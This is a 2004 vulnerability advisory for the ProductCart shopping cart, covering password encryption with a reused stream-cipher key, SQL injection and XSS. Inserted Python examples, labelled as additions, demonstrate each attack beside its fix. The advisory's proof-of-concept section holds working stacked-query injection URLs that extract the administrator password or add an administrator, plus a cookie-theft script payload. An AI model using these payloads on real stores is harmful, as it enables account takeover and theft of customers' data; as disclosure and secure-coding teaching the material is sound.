Adv-20040216.txt

18 Feb 2004 00:00:00
Reported by Nick Gudov
Type: packetstorm
Source: packetstormsecurity.com

ProductCart software has high-severity vulnerabilities including cryptography issues and SQL injection.


S-Quadra Advisory #2004-02-16  
  
Topic: EarlyImpact ProductCart shopping cart software multiple security  
vulnerabilities  
Severity: High  
Vendor URL: http://www.earlyimpact.com  
Advisory URL: http://www.s-quadra.com/advisories/Adv-20040216.txt  
Release date: 16 Feb 2004  
  
1. DESCRIPTION  
  
ProductCart is a shopping cart application for e-commerce enabled  
sites. It is written in ASP, runs on most Windows platforms and uses MS  
Access or MS SQL Server as a backend. Please visit  
http://www.earlyimpact.com for information about ProductCart shopping cart.  
  
2. DETAILS  
  
-- Vulnerability 1: Incorrect use of cryptography  
  
ProductCart uses a stream cipher (possibly RC4) to encrypt various  
passwords before storing them in the database. A stream cipher generates  
a keystream (a sequence of bits used as a key); encryption is done by  
combining the keystream with the plaintext using the bitwise XOR  
operation, and the generation of the keystream is independent of the  
plaintext and ciphertext. ProductCart uses a single cryptographic key,  
and therefore a single keystream, to encrypt all customer and store  
administrator passwords. An attacker can therefore mount a chosen  
plaintext attack: by registering a customer with a password he knows, he  
obtains the first 100 bytes of keystream (the maximum length of a  
customer password) as the XOR of that password with its stored  
ciphertext. Using these bytes an attacker can decrypt any information  
encrypted with the same key in the database, including the store  
administrator password.  
  
-- Vulnerability 2: SQL Injection vulnerability  
  
An SQL injection vulnerability has been found in the 'advSearch_h.asp'  
script.  
  
Improper filtering of user-supplied input allows an attacker to modify  
the SQL query and perform several kinds of SQL injection attack,  
including appending further statements to the query.  
  
Successful exploitation of this vulnerability could allow an attacker to  
gain administrative access to the ProductCart store and read any  
information from the store database (e.g. customers' private data). With  
an MS SQL Server backend an attacker could also execute arbitrary  
operating system commands through the xp_cmdshell extended stored  
procedure, provided the database login the store uses is permitted to  
run it.  
  
-- Vulnerability 3: Cross Site Scripting vulnerability in 'Custva.asp'  
  
By injecting specially crafted JavaScript code into the URL and tricking  
a user into visiting it, a remote attacker can steal the user's session  
ID and gain access to the user's personal data.  
  
-- PoC code  
  
--Vulnerability 1 and 2:  
  
Platform: MS SQL Server as a backend  
ProductCart uses its cryptographic algorithm incorrectly to protect the  
store administrator password. The combination of this error with the  
SQL injection vulnerability allows an attacker to gain administrative  
access to the store.  
  
By performing the following scenario an attacker can find the store  
administrator username and password.  
  
Scenario:  
  
1. The attacker registers a new customer in the store, with the value of  
the 'Postal Code' field in the registration form equal to '987654' and a  
long password (it must be longer than the store administrator's  
password, since the attack recovers only as many keystream bytes as the  
attacker's own password is long).  
  
2. The attacker performs the following request:  
  
http://[target]/productcart/pc/advSearch_h.asp?idcategory=0&idSupplier=10&customfield=0&priceUntil=999;u--pdate%20customers%20set%20name=(s--elect%20top%201%20idadmin%20from%20admins),lastName=(s--elect%20top%201%20adminpassword%20from%20admins),phone=(s--elect%20password%20from%20customers%20where%20zip=987654)%20where%20zip=987654;s--elect%20*%20from%20products%20where%201=1&Submit.y=13&priceFrom=0&sku=&keyWord=dark&IDBrand=0&resultCnt=200&Submit.x=33&   
  
  
  
3. The attacker goes to http://[target]/productcart/pc/Custmoda.asp  
and reads his personal information. The value of the "First Name" field  
in this form is now the store administrator login name, and the "Last  
Name" and "Phone" fields hold the administrator's encrypted password and  
the attacker's own encrypted password, copied there by the injected  
UPDATE statement. Since both were encrypted with the same keystream, the  
store administrator password follows from this formula:  
  
adminpass = (Last Name) xor (Phone) xor (customer login password from  
scenario step 1)  
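The keystream-reuse weakness described under Vulnerability 1 and the formula above, as an added example that is not part of the original advisory and not ProductCart's code. RC4 is used because the advisory suspects it; the server key, the passwords and the raw-byte layout of the stored ciphertexts are assumptions. It also shows the salted password hash a store should have used instead, under which knowing one record tells nothing about another.

```python
"""Keystream reuse in stream-cipher password storage (constructed example).

With one fixed key there is one fixed keystream K, so two stored passwords are
C1 = P1 xor K and C2 = P2 xor K. An attacker who knows P1 (his own password)
gets P2 = C1 xor C2 xor P1, which is the advisory's
(Last Name) xor (Phone) xor (customer password) formula.
"""
import hashlib
import hmac
import os


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Textbook RC4 (KSA + PRGA). The same key always yields the same bytes."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    while len(out) < length:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    """Bytewise XOR, truncated to the shorter operand."""
    return bytes(x ^ y for x, y in zip(a, b))


def store_password(plaintext: bytes, key: bytes) -> bytes:
    """The weak scheme the advisory describes: one key, no nonce, for every password."""
    return xor(plaintext, rc4_keystream(key, len(plaintext)))


def recover_keystream(known_plaintext: bytes, ciphertext: bytes) -> bytes:
    """Chosen-plaintext step: the attacker's own registration password yields
    exactly as many keystream bytes as that password is long."""
    return xor(known_plaintext, ciphertext)


def recover_admin_password(last_name: bytes, phone: bytes, own_password: bytes) -> bytes:
    """The advisory's formula. After the injected UPDATE, 'Last Name' holds the
    administrator's ciphertext and 'Phone' the attacker's own ciphertext."""
    if len(own_password) < len(last_name):
        raise ValueError("own password must be at least as long as the admin ciphertext")
    return xor(xor(last_name, phone), own_password)


# Constructed data; the server key is assumed unknown to the attacker.
SERVER_KEY = b"constructed-demo-key"
ADMIN_PASSWORD = b"pc-admin-2004"
ATTACKER_PASSWORD = b"A" * 100  # the longest allowed, as scenario step 1 requires


def demo_attack() -> bytes:
    """Runs the whole chain: both ciphertexts land in the attacker's profile,
    and XOR with his known password gives back the administrator's password."""
    admin_ct = store_password(ADMIN_PASSWORD, SERVER_KEY)        # admins.adminpassword
    attacker_ct = store_password(ATTACKER_PASSWORD, SERVER_KEY)  # customers.password
    return recover_admin_password(admin_ct, attacker_ct, ATTACKER_PASSWORD)


def store_password_hashed(password: bytes, salt: bytes = b"") -> tuple:
    """What to do instead: a salted, deliberately slow one-way hash."""
    salt = salt or os.urandom(16)
    return salt, hashlib.pbkdf2_hmac("sha256", password, salt, 200_000)


def verify_password(password: bytes, salt: bytes, digest: bytes) -> bool:
    """Constant-time comparison of the recomputed hash against the stored one."""
    return hmac.compare_digest(hashlib.pbkdf2_hmac("sha256", password, salt, 200_000), digest)
```

The attack needs no knowledge of the cipher beyond the fact that it is a stream cipher with a fixed key; RC4 here could be replaced by any other and `demo_attack()` would still return the administrator's password.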
  
In the following scenario an attacker can add a new administrator to the  
store.  
  
Scenario:  
  
1. The attacker registers a new customer in the store, with the value of  
the 'First Name' field in the registration form equal to  
'1*2*3*4*5*6*7*8*9*10*', the value of the 'Last Name' field equal to  
'34567', the value of the 'Password' field equal to '111' and the value  
of the 'Postal Code' field equal to '987654'.  
  
2. The attacker performs the following request:  
  
http://[target]/productcart/pc/advSearch_h.asp?idcategory=0&idSupplier=10&customfield=0&priceUntil=999;in--sert%20into%20admins%20(idadmin,%20adminpassword,%20adminlevel)%20s--elect%20lastName,%20password,%20name%20from%20customers%20where%20zip=987654;s--elect%20*%20from%20products%20where%201=1&Submit.y=13&priceFrom=0&sku=&keyWord=dark&IDBrand=0&resultCnt=200&Submit.x=33&   
  
  
  
3. The attacker logs into the store admin interface with username  
'34567' and password '111'. The injected INSERT copied the attacker's  
'Last Name' into idadmin, his encrypted password into adminpassword  
(which matches what the admin login form produces, since it is encrypted  
under the same key) and his 'First Name' into adminlevel.  
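The stacked-query injection used in the two scenarios, as an added example that is not part of the original advisory and not ProductCart's code. sqlite3 stands in for MS SQL Server: `executescript()` runs a whole batch the way an ADO `Execute` of concatenated SQL does on SQL Server. The table and column names (customers, admins, idadmin, adminpassword, adminlevel, lastName, password, name, zip) are taken from the PoC URLs; the products table, the exact search query and the plaintext storage of the password are assumptions. The advisory's URLs spell the keywords as u--pdate and s--elect without saying why; the example uses the plain keywords.

```python
"""Stacked-query SQL injection through a numeric search parameter (constructed example)."""
import sqlite3


def setup_db() -> sqlite3.Connection:
    """Minimal store schema inferred from the advisory's PoC (assumption)."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        create table products (idproduct integer, name text, price real);
        create table customers (name text, lastName text, phone text, password text, zip integer);
        create table admins (idadmin text, adminpassword text, adminlevel text);
        insert into products values (1, 'dark roast', 9.5), (2, 'dark ale', 1200);
        insert into admins values ('storeadmin', 'ciphertext', '1*2*3*4*5*6*7*8*9*10*');
    """)
    return con


def register_customer(con, first: str, last: str, password: str, zipcode: int) -> None:
    """Step 1 of the second scenario: profile fields the attacker chooses freely."""
    con.execute("insert into customers values (?, ?, ?, ?, ?)",
                (first, last, "", password, zipcode))


def vulnerable_search(con, price_until: str) -> None:
    """The flaw: user input spliced into SQL text and the whole batch executed.
    Result handling is omitted; the side effects on other tables are the point."""
    sql = "select * from products where price <= " + price_until
    con.executescript(sql)


def safe_search(con, price_until: str) -> list:
    """The fix: validate the type first, then bind the value as a parameter."""
    try:
        limit = float(price_until)
    except ValueError:
        raise ValueError("priceUntil must be numeric") from None
    return con.execute("select * from products where price <= ?", (limit,)).fetchall()


# The advisory's second payload, URL-decoded and with plain keywords.
PAYLOAD = ("999;insert into admins (idadmin, adminpassword, adminlevel) "
           "select lastName, password, name from customers where zip=987654;"
           "select * from products where 1=1")


def demo_attack():
    """Returns the administrator row the injected INSERT created."""
    con = setup_db()
    register_customer(con, "1*2*3*4*5*6*7*8*9*10*", "34567", "111", 987654)
    vulnerable_search(con, PAYLOAD)
    return con.execute(
        "select idadmin, adminpassword, adminlevel from admins where idadmin = '34567'"
    ).fetchone()


def demo_fixed() -> int:
    """Same payload against the fixed search: rejected, admins table untouched."""
    con = setup_db()
    register_customer(con, "1*2*3*4*5*6*7*8*9*10*", "34567", "111", 987654)
    try:
        safe_search(con, PAYLOAD)
    except ValueError:
        pass
    return con.execute("select count(*) from admins").fetchone()[0]
```

Parameter binding alone would already stop the batch from growing; the numeric check on top of it rejects the request outright, which is the right answer for a field that can only ever be a price.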
  
-- Vulnerability 3:  
  
http://[target]/productcart/pc/Custva.asp?redirectUrl="><script>alert(document.cookie)</script><"   
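The attribute-breaking payload above beside the output encoding that defeats it, as an added example that is not part of the original advisory and not ProductCart's code. The advisory does not show how Custva.asp writes redirectUrl back into the page; the example assumes a hidden form field, which is the shape the '"><' payload is built for.

```python
"""Reflected XSS through an unescaped HTML attribute value (constructed example)."""
import html
from html.parser import HTMLParser

# The advisory's PoC value for redirectUrl, URL-decoded.
PAYLOAD = '"><script>alert(document.cookie)</script><"'


def render_vulnerable(redirect_url: str) -> str:
    """Attacker input written straight into the attribute: the leading '">'
    closes the input tag and everything after it is parsed as new markup."""
    return '<input type="hidden" name="redirectUrl" value="%s">' % redirect_url


def render_fixed(redirect_url: str) -> str:
    """Same template, but the value is HTML-attribute encoded: & < > " ' become
    entities, so the input can neither end the attribute nor the tag."""
    return '<input type="hidden" name="redirectUrl" value="%s">' % html.escape(redirect_url, quote=True)


class PageInspector(HTMLParser):
    """Stands in for the browser: counts <script> start tags and records the
    value the input element actually ends up with."""

    def __init__(self) -> None:
        super().__init__()
        self.scripts = 0
        self.redirect_value = None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.scripts += 1
        if tag == "input":
            self.redirect_value = dict(attrs).get("value")


def inspect(markup: str) -> PageInspector:
    parser = PageInspector()
    parser.feed(markup)
    parser.close()
    return parser


def count_script_tags(markup: str) -> int:
    return inspect(markup).scripts


def parsed_redirect_value(markup: str):
    """The attribute value as a browser would see it after entity decoding."""
    return inspect(markup).redirect_value
```

With the fixed rendering the browser still receives the full payload string, but only as the inert value of the field; no script element exists. Marking the session cookie HttpOnly would additionally keep `document.cookie` from exposing the session ID the advisory says this attack steals.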
  
  
  
3. FIX INFORMATION  
  
S-Quadra alerted the EarlyImpact development team to these issues on 29  
January 2004.  
  
4. CREDITS  
  
Nick Gudov <[email protected]> is responsible for discovering these  
issues.  
  
5. ABOUT  
  
S-Quadra offers services in computer security, penetration testing and  
network assessment, web application security, source code review and  
third party product vulnerability assessment, forensic support and  
reverse engineering.  
  
S-Quadra Advisory #2004-02-16  
